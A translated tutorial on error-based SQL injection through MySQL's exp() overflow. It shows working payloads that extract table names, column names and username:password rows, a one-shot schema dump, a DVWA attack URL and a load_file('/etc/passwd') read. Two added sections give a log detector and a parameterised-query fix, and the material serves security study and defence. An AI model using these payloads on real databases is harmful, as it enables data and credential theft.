2025-01-19 Update From: SLTechnology News&Howtos (shulou), Network Security
Shulou (Shulou.com) 05/31 Report
This article explains how MySQL's exp() function can be used for error-based SQL injection. The material is simple and clearly organised; I hope it clears up any doubts as the editor walks you through it.
0x01 Introduction Overview
A DOUBLE overflow error exists in MySQL. Among MySQL's built-in functions, the mathematical ones are the most interesting here, because their results have to be stored in a numeric type with a limited range. The editor therefore tested which functions raise an overflow error and found that exp() does so whenever its argument is greater than 709.
mysql> select exp(709);
+-----------------------+
| exp(709) |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
In MySQL, exp() is the inverse of ln() and log(). Briefly, log() and ln() both return the logarithm to base e, as shown here:
mysql> select log(15);
+------------------+
| log(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
mysql> select ln(15);
+------------------+
| ln(15) |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
The exponential function is the inverse of the logarithmic function: exp() raises e to the given power, so applying it to the value above returns 15:
mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
| 15 |
+-----------------------+
1 row in set (0.00 sec)
0x02 Injection
For injection, we use bitwise-negated queries to trigger the "DOUBLE value is out of range" error. As noted in the author's earlier post, the bitwise NOT of 0 (~0) returns 18446744073709551615, and because a successfully executed function evaluates to 0, negating such a function yields an unsigned BIGINT value of ***.
mysql> select ~0;
+----------------------+
| ~0 |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)
mysql> select ~(select version());
+----------------------+
| ~(select version()) |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)
Combining a subquery with bitwise inversion inside exp() produces the DOUBLE overflow error, and the error message echoes the subquery's result, which is the data we extract.
mysql> select exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
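Added example (not from the original article): a small detector that scans constructed web access-log and application-log lines for the two indicators this section describes, the exp(~(select ...)) payload shape and MySQL's ERROR 1690 "DOUBLE value is out of range" message. The regexes, log formats and sample lines are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Signature of the exp() error injection described above: exp( wrapped around a
# bitwise-negated subquery. Case and spacing vary, so the line is normalised first.
EXP_NEG_SUBQUERY = re.compile(r"exp\s*\(\s*~[\s(]*select\b", re.IGNORECASE)
# MySQL's DOUBLE overflow error; its message echoes the subquery result.
DOUBLE_OVERFLOW = re.compile(r"ERROR 1690 \(22003\)|DOUBLE value is out of range", re.IGNORECASE)

def normalise(text: str) -> str:
    """URL-decode until stable (catches double encoding), drop inline comments, squash spaces."""
    prev = None
    while prev != text:
        prev, text = text, unquote_plus(text)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def classify(line: str) -> list:
    """Return the names of the indicators that fire on one log line."""
    hits = []
    norm = normalise(line)
    if EXP_NEG_SUBQUERY.search(norm):
        hits.append("exp_overflow_payload")
    if DOUBLE_OVERFLOW.search(norm):
        hits.append("double_overflow_error")
    return hits

def scan(lines):
    """Return (line, indicators) pairs for every line with at least one indicator."""
    return [(line, hits) for line in lines if (hits := classify(line))]

# Constructed sample lines (assumed formats): an access-log request carrying the
# DVWA-style payload, an application log echoing the MySQL error, and a benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2024:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=1%27+or+exp(~(select*from(select+user())x))--+-&Submit=Submit HTTP/1.1" 200 512',
    "2024-05-31 10:01:02 app ERROR db: ERROR 1690 (22003): DOUBLE value is out of range "
    "in 'exp(~((select 'root@localhost' from dual)))'",
    '10.0.0.7 - - [31/May/2024:10:01:05 +0000] "GET /dvwa/vulnerabilities/sqli/'
    '?id=2&Submit=Submit HTTP/1.1" 200 480',
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG):
        print(hits, line[:90])
```

A spike of ERROR 1690 in the database or application log is worth alerting on by itself, since normal application code rarely overflows a DOUBLE.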
0x03 Data injection
Get table name:
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
Get column names:
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
Retrieve row data:
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
0x04 Dump in one shot (DIOS)
This query dumps all tables and columns of the current database in one shot. It could also dump every database, but because the result comes back through an error message, only a small part of it is returned.
exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))
http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#
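Added example, not code from the original article or from DVWA: the request above works because the id parameter is spliced into the SQL text and the database error is shown to the client. The hypothetical lookup_vulnerable, lookup_hardened and handle_request functions below contrast that pattern with a parameterised query and a generic error response, using an in-memory SQLite table as a constructed stand-in for the users table.

```python
import logging
import sqlite3

log = logging.getLogger("app")

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the DVWA users table so the example runs offline."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id TEXT, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("1", "admin", "hash1"), ("2", "gordonb", "hash2")])
    return con

def lookup_vulnerable(con, user_id: str):
    """Vulnerable pattern: the parameter becomes part of the SQL text, so a value like
    1' or exp(~(select*from(select user())x))-- -  rewrites the query."""
    sql = f"SELECT username FROM users WHERE id = '{user_id}'"
    return [r[0] for r in con.execute(sql)]

def lookup_hardened(con, user_id: str):
    """Parameterised query: the whole value is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE id = ?"
    return [r[0] for r in con.execute(sql, (user_id,))]

def handle_request(con, user_id: str, lookup) -> dict:
    """Map database errors to a fixed client message. The verbose error, which in the
    MySQL case carries the leaked subquery result, goes to the server log only."""
    try:
        return {"status": 200, "rows": lookup(con, user_id)}
    except sqlite3.Error as exc:
        log.error("database error for id=%r: %s", user_id, exc)
        return {"status": 500, "error": "request could not be processed"}

# The id value from the DVWA URL above, URL-decoded.
PAYLOAD = "1' or exp(~(select*from(select user())x))-- -"

if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, "1", lookup_hardened))        # normal lookup
    print(handle_request(db, PAYLOAD, lookup_hardened))    # no rows: payload is just a string
    print(handle_request(db, PAYLOAD, lookup_vulnerable))  # query rewritten; generic error
```

Both layers matter: parameterisation removes the injection, and the generic error response removes the channel through which exp() leaks data even if some other query is still concatenated.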
0x05 Read file
Files can be read with the load_file() function, although the author found a restriction of 13 lines; the same statement can also be used in BIGINT overflow injections.
select exp(~(select*from(select load_file('/etc/passwd'))a));
Note that this cannot be used to write to a file, because the error causes only a 0 to be written.
mysql> select exp(~(select*from(select 'hello')a)) into outfile 'C:/out.txt';
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))'
# type C:\out.txt
0
0x06 Injection in Insert
The same pattern applies inside an INSERT; the payload is combined with a column value through an operator such as ^:
mysql> insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'Eyre');
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
DIOS queries can also be used in all INSERT, UPDATE and DELETE statements.
mysql> insert into users (id, username, password) values (2, '' | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), 'Eyre');
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000 newdb::users::id newdb::users::username newdb::users::password' from dual)))'
0x07 Injection in Update
mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4;
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
0x08 Injection in Delete
mysql> delete from users where id='1' | exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
As with the BIGINT injections described earlier, exp() injections work on MySQL 5.5.5 and above. Earlier versions do not raise an error in this situation and silently return infinity:
mysql> select version();
+---------------------+
| version() |
+---------------------+
| 5.0.45-community-nt |
+---------------------+
1 row in set (0.00 sec)
mysql> select exp(710);
+----------+
| exp(710) |
+----------+
| 1.#INF |
+----------+
1 row in set (0.00 sec)
mysql> select exp(~0);
+---------+
| exp(~0) |
+---------+
| 1.#INF |
+---------+
1 row in set (0.00 sec)
There may be other functions that generate this error.
That is all of "how to use exp for SQL error injection". Thank you for reading! I hope the content has given everyone a clear understanding of the technique; if you want to learn more, follow the industry information channel.